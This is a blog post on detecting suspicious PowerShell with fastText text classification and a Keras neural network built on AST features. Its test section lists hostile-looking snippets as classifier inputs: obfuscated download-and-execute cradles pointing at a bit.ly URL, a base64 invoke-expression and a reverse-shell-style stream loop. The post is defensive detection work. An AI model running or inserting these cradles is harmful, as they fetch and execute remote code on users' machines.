detection – Attacker's Mindset

Recently I’ve been wanting to dive into anomaly detection and classification problems – I’m starting this by exploring a binary-classification issue – trying to determine whether or not a PowerShell snippet is benign or suspicious.

There are many different approaches to this problem-class. I decided to start with a “batteries-included” approach to text classification with the help of fastText (https://github.com/facebookresearch/fastText). This awesome piece of software from Facebook Research can perform both un-supervised and supervised training with tunable parameters on a set of pre-processed input data.

Similar to most other data science projects, I started this by spending a significant amount of time identifying and categorizing source material, mostly by scraping PowerShell scripts available from a variety of sources (e.g., GitHub, Hybrid Analysis, etc). Each script was saved into a labelled directory indicating what type of scripts it contains. Since this is a binary classification task, we are only going to be using the labels of ‘suspicious’ or ‘benign’ with each script having exactly 1 label.

A future task would be adding additional labels such as “malicious” to provide more flexibility to the classifications and subsequent conclusions we draw from them (I stored them with some flexibility to distinguish between suspicious and purely malicious but am only using the single label of ‘suspicious’ for this experiment).

Example showing data organization / classification structure

Another approach to this problem would be creating many different distinct labels and using the percent confidence for each to infer what the functionality of the script is, what MITRE Techniques it is employing, etc.

Text Classification with fastText

Supervised Learning with fastText for Text Classification can be done by supplying the model with an input file in a specific format. The default structure should contain line-delimited data where lines begin with all relevant labels for the current line. The default format for labels is ‘__label__$VAR’ where $VAR is the relevant key-word such as ‘__label__benign’.

__label__benign some line of data
__label__suspicious another line of data

For this experiment, I wanted to try a few different methods of classifying scripts. Initially, I did a very basic implementation to try a pure text classification approach. Later on, I’d like to combine this model’s prediction output with an Abstract Syntax Tree (AST) neural network analysis to produce a combined probability matrix ,which we can then analyze to more effectively determine if a script is suspicious or not.

For now, I took the following approach to data preparation;

Read each script into memory
Normalize the data by stripping white-space and lower-casing the entire script
Remove un-wanted characters to help improve classification traits
Write each script (as a single string per-line) into a file with the relevant label as a prefix

After this initial data aggregation step, I shuffled the line-ordering and split the data into a 70/30% mix of training and test data respectively. Using 100% of the source data to train can overfit a model to the training data and lead to critical failures when classifying new data – this helps identify that problem and attempt to mitigate early on.

Total Scripts: 10433 
Training Data Length: 7303 
Testing Data Length: 3130 
Suspicious Scripts: 4776 
Benign Scripts: 5657

Now it’s time for the fun part. Training a fastText model can have a lot of nuances but at it’s core, it can be done in two lines like this.

import fasttext
model = fasttext.train_supervised('pslearn.train')

That’s it! – I can now use the test dataset to gauge the prediction accuracy of our first supervised fastText model.

model.test('pslearn.test')
(3130, 0.9450479233226837, 0.9450479233226837)

The first number (3130) represents the number of samples in the test data. The second number represents the precision (~94%) and the last number represents the recall (~94%).

Per fastText documentation:

The precision is the number of correct labels among the labels predicted by fastText. The recall is the number of labels that successfully were predicted, among all the real labels.
https://fasttext.cc/docs/en/supervised-tutorial.html

A precision metric of 94% seems extremely high – I have a very limited sample set and it is highly likely that I have accidentally introduced a high amount of bias to the source data. One way I can solve this is by reviewing the data and ensuring that there is a wide variety of samples in different formats and stylings to introduce additional variety to the training and testing data.

For now, lets see if I can improve the model by using some additional options provided by fastText – word n-grams and epoch count. By default, fastText only uses 5 epochs for learning – lets try tripling that number to 15 and see if there is any effect on the accuracy.

model = fasttext.train_supervised('pslearn.train', epoch=15)
model.test('pslearn.test')
(3130, 0.9619808306709265, 0.9619808306709265)

A small increase in the number of epochs had a significant effect on the accuracy, however, the trade-off is a longer processing time when training (or re-training) the model. Since we have a relatively small data set (~100 MB) I can experiment with extremely high epoch counts such as 1000+, like below.

model = fasttext.train_supervised('pslearn.train', epoch=1000)
model.test('pslearn.test')
(3130, 0.9769968051118211, 0.9769968051118211)

The key to data science is always experimentation – I played with the epoch count for a while to find the optimal balance of time to run vs accuracy vs not overfitting to the current data. At 500 runs I still had a precision measurement of 97.6%, 250 runs actually increased to 98% while 100 lowered slightly to 97.8% – 50 runs achieved an accuracy of 97.5%, and 25 runs was 96.9%. I decided to keep it at 25 to avoid overfitting for most of this experiment.

In addition to epoch count, one of the other commonly tuned parameters for a fastText model is the learning rate. For a detailed explanation, check out the documentation at https://fasttext.cc/docs/en/supervised-tutorial.html. The default Learning Rate is 0.1, but lets try 0.2 and see if there is any improvement when using an epoch count of 25.

model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2)
model.test('pslearn.test')
(3130, 0.9750798722044729, 0.9750798722044729)

Doubling the learning rate improved our base accuracy at 25 epochs from ~96.9% to ~97.5%.

There’s one last thing I should experiment with – the word n-grams argument. For a detailed explanation of n-grams, check out https://towardsdatascience.com/understanding-word-n-grams-and-n-gram-probability-in-natural-language-processing-9d9eef0fa058. The default value in fastText is 1. Let’s try stepping up to a few different parameters and observe the results on our prediction accuracy.

model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=2)
model.test('pslearn.test')
(3130, 0.9738019169329073, 0.9738019169329073)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=5)
model.test('pslearn.test')
(3130, 0.9584664536741214, 0.9584664536741214)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=10)
model.test('pslearn.test')
(3130, 0.9536741214057508, 0.9536741214057508)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=50)
model.test('pslearn.test')
(3130, 0.9306709265175719, 0.9306709265175719)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=100)
model.test('pslearn.test')
(3130, 0.9287539936102236, 0.9287539936102236)

Word N-Gram length should be decided based on the current use-case as well as experimented with since it can have a severe impact on model accuracy depending on the type of data. I decided to leave it at the default for now.

fastText provides many other parameters for model tuning – view them all at https://fasttext.cc/docs/en/options.html.

Below you can see the results of some of the ad-hoc tests I ran against it with some arbitrary PowerShell scripts that were not included in testing or training data.

Input: invoke-expression -command ([text.encoding]::unicode.getstring([convert]::frombase64string("vwbyagkadablac0asabvahmadaagaciadab3aguazqb0acwaiab0ahcazqblahqaiqaiaa==
Confidence __label__suspicious: 97.43660092353821%
Confidence __label__benign: 2.5653984397649765%

Input: enable-windowsoptionalfeature -online -featurename microsoft-hyper-v -all -norestart
Confidence __label__benign: 56.333380937576294%
Confidence __label__suspicious: 43.66862177848816%

Input: $output  | ft -property @{n="$source";e={$_.$source};a="center"},@{n="$dest";e={$_.$dest};a="center"},@{n="$temp";e={$_.$temp};a="center"}
Confidence __label__benign: 71.88595533370972%
Confidence __label__suspicious: 28.116050362586975%

Input: $null = [getclipboardprocess]::getwindowthreadprocessid([getclipboardprocess]::getopenclipboardwindow(), [ref]$processid)
Confidence __label__suspicious: 99.66542720794678%
Confidence __label__benign: 0.33657397143542767%

Input: while (!$process.hasexited) {try {$bytes = $stream.read($buffer, 0, $buffer.length); # unblock with timeoutif ($bytes -gt 0) {$process.standardinput.write($buffer, 0, $bytes);} else { break; }} catch [management.automation.methodinvocationexception] {}if ($stderr.length -gt 0) {$writer.write($stdout.tostring()); $stdout.clear();}if ($stdout.length -gt 0) {$writer.write($stdout.tostring()); $stdout.clear();}}
Confidence __label__suspicious: 99.98868703842163%
Confidence __label__benign: 0.013308007328305393%

Input: $flowpanel.flowdirection = [system.windows.forms.flowdirection]::righttoleft
Confidence __label__suspicious: 86.15033030509949%
Confidence __label__benign: 13.851676881313324%

Input: invoke-command -computer wks1,wks2,wks3 -scriptblock { disable-windowsoptionalfeature -online -featurename "microsoftwindowspowershellv2" -norestart }
Confidence __label__benign: 99.58958029747009%
Confidence __label__suspicious: 0.41241757571697235%

Input: invoke-expression (new-object net.web`c`l`i`ent)."`d`o`wnloadstring"('h'+'t'+'t'+'ps://bit.ly/l3g1t')
Confidence __label__suspicious: 99.85156059265137%
Confidence __label__benign: 0.1504492713138461%

Input: powershell.exe `wr`it`e-`h`ost alertmeagain
Confidence __label__suspicious: 94.03488039970398%
Confidence __label__benign: 5.9671226888895035%

Input: powershell.exe (new-object net.webclient).downloadstring("https://bit.ly/l3g1t")
Confidence __label__suspicious: 99.99812841415405%
Confidence __label__benign: 0.0038762060285080224%

97% accuracy? Really?

No, not really – I have a really small sample set of data and it is highly biased. I also don’t have many ‘real world’ samples right now but am working on a pipeline to generate more variants like you might expect to see in a true adversary engagement. As per above, this type of ‘simple’ text classification can work but is very lacking when it comes to highly-complex use-cases where the same ‘sentiment’ can be expressed in hundreds of ways – what else can I do?

Embed additional labelling for each script to help with classifying and having a secondary process for guessing probability based on the confidence in each label
Gather/Generate additional source data for better classification and a wider variety of training and testing data
Experiment with different text classification models
etc

Using fastText itself is ridiculously easy – the hard part of a data scientists life is preparing the source material. Data Pre-Processing pipelines are often extremely complex to ensure the cleanest feed to downstream ML models – the exact type of processing required is typically dependent on project-specific features such as the overall objective, the types of machine-learning models or approaches, etc.

AST Modeling in a Deep Neural Network (DNN)

In addition to text classification, I wanted to try feature engineering for a machine-learning model. Ultimately, I decided to use my features inside of a “Deep & Wide” style network built with Keras and Tensorflow. Feature Engineering is probably one of the most important part of any ML workflow – for this project, I took a basic approach and using https://github.com/thewhiteninja/deobshell I generated optimized AST files for each of the previously collected PowerShell scripts.

What is an AST file? – https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree

In generating features from these ‘optimized’ AST representations we can parse the script functionality at a lower-level than just reading the raw .ps1 file and receive more meaningful insight into what components make up the script.

Why would I want to do this? fastText is great but studying the data at a lower-level in a neural network could help teams gain some deeper insight into the data in a way that fastText might not help us as much with. Ultimately, the best approach would be to have multiple prediction pipelines to get outputs from various models and glue the results together with some logic.

I parsed each AST and generated a set of features representing the below items (along with a few others)

Distinct PowerShell Tree-Type Count
Sum for each type of AST Object present in the script (CommandElementAST, etc)
Variable / Operator / Condition sums
Presence of certain ‘suspicious’ strings inside the script (‘IEX’, etc)
etc

Once I have the data cleaned and stored appropriately in a CSV, I can set up the below workflow for running independent experiments (code truncated for readability).

# Setup Required Imports, Constants, etc
CSV_HEADER = []
NUMERIC_FEATURE_NAMES = []
for c in raw_data.columns:
    CSV_HEADER.append(c)
    if c != 'label':
        NUMERIC_FEATURE_NAMES.append(c)

# All of my features are numeric and not categorical
TARGET_FEATURE_NAME = "label"
TARGET_FEATURE_LABELS = [0.0, 1.0]
CATEGORICAL_FEATURES_WITH_VOCABULARY = {}
CATEGORICAL_FEATURE_NAMES = list(CATEGORICAL_FEATURES_WITH_VOCABULARY.keys())
FEATURE_NAMES = NUMERIC_FEATURE_NAMES + CATEGORICAL_FEATURE_NAMES
COLUMN_DEFAULTS = [[0.0] for feature_name in CSV_HEADER]
NUM_CLASSES = len(TARGET_FEATURE_LABELS)

# How the model will parse the data from disk
def get_dataset_from_csv(csv_file_path, batch_size, shuffle=False):
    dataset = tf.data.experimental.make_csv_dataset(
        csv_file_path,
        batch_size=batch_size,
        column_names=CSV_HEADER,
        column_defaults=COLUMN_DEFAULTS,
        label_name=TARGET_FEATURE_NAME,
        num_epochs=1,
        header=True,
        shuffle=shuffle,
    )
    return dataset.cache()

# Invoke an experiment
def run_experiment(model):
    model.compile(
        optimizer=keras.optimizers.Adam(learning_rate=learning_rate),
        loss=keras.losses.SparseCategoricalCrossentropy(),
        metrics=[keras.metrics.SparseCategoricalAccuracy()],
    )
    train_dataset = get_dataset_from_csv(train_data_file, batch_size, shuffle=True)
    test_dataset = get_dataset_from_csv(test_data_file, batch_size)
    print("Start training the model...")
    history = model.fit(train_dataset, epochs=num_epochs)
    print("Model training finished")
    _, accuracy = model.evaluate(test_dataset, verbose=0)
    print(f"Test accuracy: {round(accuracy * 100, 2)}%")

# Encode Input Layers
def create_model_inputs():
    return inputs

# Encode Features depending on type
def encode_inputs(inputs, use_embedding=False):
    return all_features

# Create Keras Network Model - using a softmax output 
def create_wide_and_deep_model():
    return model

# Run the experiment!
wide_and_deep_model = create_wide_and_deep_model()
#keras.utils.plot_model(wide_and_deep_model, show_shapes=True, rankdir="LR")
run_experiment(wide_and_deep_model)

Start training the model...
Epoch 1/10
32/32 [==============================] - 453s 3s/step - loss: 0.4908 - sparse_categorical_accuracy: 0.7793
Epoch 2/10
32/32 [==============================] - 8s 239ms/step - loss: 0.2756 - sparse_categorical_accuracy: 0.9325
Epoch 3/10
32/32 [==============================] - 8s 245ms/step - loss: 0.2000 - sparse_categorical_accuracy: 0.9508
Epoch 4/10
32/32 [==============================] - 8s 244ms/step - loss: 0.1548 - sparse_categorical_accuracy: 0.9580
Epoch 5/10
32/32 [==============================] - 8s 245ms/step - loss: 0.1358 - sparse_categorical_accuracy: 0.9640
Epoch 6/10
32/32 [==============================] - 8s 249ms/step - loss: 0.1196 - sparse_categorical_accuracy: 0.9656
Epoch 7/10
32/32 [==============================] - 8s 246ms/step - loss: 0.1073 - sparse_categorical_accuracy: 0.9671
Epoch 8/10
32/32 [==============================] - 8s 245ms/step - loss: 0.0965 - sparse_categorical_accuracy: 0.9695
Epoch 9/10
32/32 [==============================] - 8s 243ms/step - loss: 0.1022 - sparse_categorical_accuracy: 0.9666
Epoch 10/10
32/32 [==============================] - 8s 244ms/step - loss: 0.0940 - sparse_categorical_accuracy: 0.9711
Model training finished
Test accuracy: 74.9%

In the end, I can see the network was able to predict whether a script in the validation data was suspicious or not with a ~75% accuracy – not too bad for the very first attempt. Doubling the epoch count to 20 runs got me to ~80% accuracy without a huge risk of over-fitting. What else could I do to improve this?

Feature Dimensionality Reduction (Linearly with PCA or non-linearly with better AutoEncoders)
Better Feature Engineering – it is very basic currently
Tuning Model Parameters/Hyperparameters manually to experiment with learning impact
Better AST Optimization/Script De-obfuscation Techniques
etc

I have some other ideas for feature building techniques with respect to PowerShell analysis that I’m excited to keep exploring and building machine-learning models around – if you’re interested in similar topics, reach out and lets discuss!

Machine Learning to identify evil isn’t a new concept – but the exact techniques utilized are not often shared to the public for a few reasons. First being that threat actors could analyze then workaround the detection mechanisms and secondly, these workflows often power revenue-generating streams and sharing them could impact profits. I’m hoping that in coming years the open-source detection community starts to build and share more ready-to-use models that organizations can use for these types of classification tasks.

Look out for the next post, should be interesting – and let me know if there are any questions!

Tag: detection

Analyzing publicly-exposed Cobalt Strike beacon configurations

Detecting Suspicious PowerShell scripts with Text Classification and Deep Neural Networks